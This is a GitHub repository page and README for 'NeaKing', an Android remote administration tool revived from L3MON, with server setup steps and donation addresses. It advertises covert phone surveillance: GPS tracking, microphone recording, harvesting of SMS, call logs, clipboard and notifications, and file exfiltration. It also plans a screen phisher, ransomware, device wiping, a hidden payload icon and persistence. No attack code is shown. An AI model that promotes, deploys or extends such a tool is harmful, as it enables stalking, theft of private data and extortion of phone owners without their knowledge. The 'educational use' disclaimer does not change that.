Skip to content

Android Remote Administration Tool | Powered by Node JS | added JDK 11 support | A revival of the original repository at https://github.com/D3VL/L3MON

License

Notifications You must be signed in to change notification settings

yunatamos/neaking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

A cloud based remote android management suite, powered by NodeJS,Express and MongoDb

Features

  • Move database to Mongo DB
  • Move to Kotlin
  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing

Features to be implemented

  • Register Users So that it is not only one User
  • Built In APK Builder
  • Build ReactJs Front End
  • Anti-Delete
  • Screen Control
  • Format Phone (device admin request is present) Only implementing
  • Phone Call
  • Screen Phisher
  • Dump System Info
  • Live Webcam Stream
  • Uninstall App
  • Lock/Unlock Screen (device admin request is present) Only implementing
  • Run Shell Command
  • Webcam Snap
  • Open App
  • Install App
  • Device Info
  • Hide/Show payload app icon (Make work on version 11,12,13) Available in below
  • Fastest Screen Control
  • Call Forwarder
  • Anti Delete
  • Lock Screen ( Screen On But cannot Touch )
  • Ransomware (device admin request is present) Only implementing
  • Freeze Phone
  • Change Wallpaper (device admin request is present) Only implementing
  • Persistent In Background

Prerequisites

  • Java Runtime Environment 11
  • NodeJs
  • A Server

Installation

  1. Install JRE 11 (We cannot stress this enough USE java 11 ANY issues that dont use this will be closed WITHOUT a response)

    • Debian, Ubuntu, Etc
      • sudo apt-get install openjdk-11-jre
    • Fedora, Oracle, Red Hat, etc
      • su -c "yum install java-11-openjdk"
    • Windows
      • click HERE for downloads
  2. Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this)

  3. install PM2

    • npm install pm2 -g
  4. Releases coming soon

  5. In the extracted folder, run these commands

    • npm install <- install dependencies
    • pm2 start index.js <-- start the script
    • pm2 startup <- to run L3MON on startup
  6. Set a Username & Password

    1. Stop NeaKing pm2 stop index
    2. Open maindb.json in a text editor
    3. under admin
      • set the username as plain text
      • set the password as a LOWERCASE MD5 hash
      • very soon we are going to move user registration Using reactjs
    4. save the file
    5. run pm2 restart all
  7. in your browser navigate to http://<SERVER IP>:22533

It's recommended to run NeaKing behind a reverse proxy such as NGINX or Open Vpn Install OpenVpn

  • Debian, Ubuntu, Etc
  • sudo apt install openvpn use PortMap for configuration and this youtube Video for instruction to get key
  • sudo openvpn --config /path/to/openvpnconfingFile.ovpn &

Notes

When opening an issue, you MUST use the provided templates. Issues without this will not receive support quickly and will be put to the bottom of the figurative pile.

Please have a look through the current issues, open and closed to see if your issue has been addressed before. If it's java related, it's most definitely been addressed - In short Use Java 1.8.0

Screenshots

Coming Soon

Thanks

Neaking Builds off and utilizes server opensource software's, Without these, Neaking Wouldn't be what it is!

donate to us

  • $5 $10, $15, $20 $50 $500
  • bitcoin: bc1qthcek3k95hauc6ssx0h8e533juq9aszsztlgfj
  • ETH /USDT: 0xBbde3bE748CaEB04801d9C728fdFeC418c6Eaf6E
  • TRON /USDT: TDo3yMbQDgeikvwwVJNeprx2jeyScyadsA

Support

For support, Signal +254702707676,or @yunatamos just everywhere

Disclaimer

YUNAT AMOS Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
NEAKING is built for both Educational and Internal use ONLY.


Made with ❤️ By Yunat Amos

v1.0.0

About

Android Remote Administration Tool | Powered by Node JS | added JDK 11 support | A revival of the original repository at https://github.com/D3VL/L3MON

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published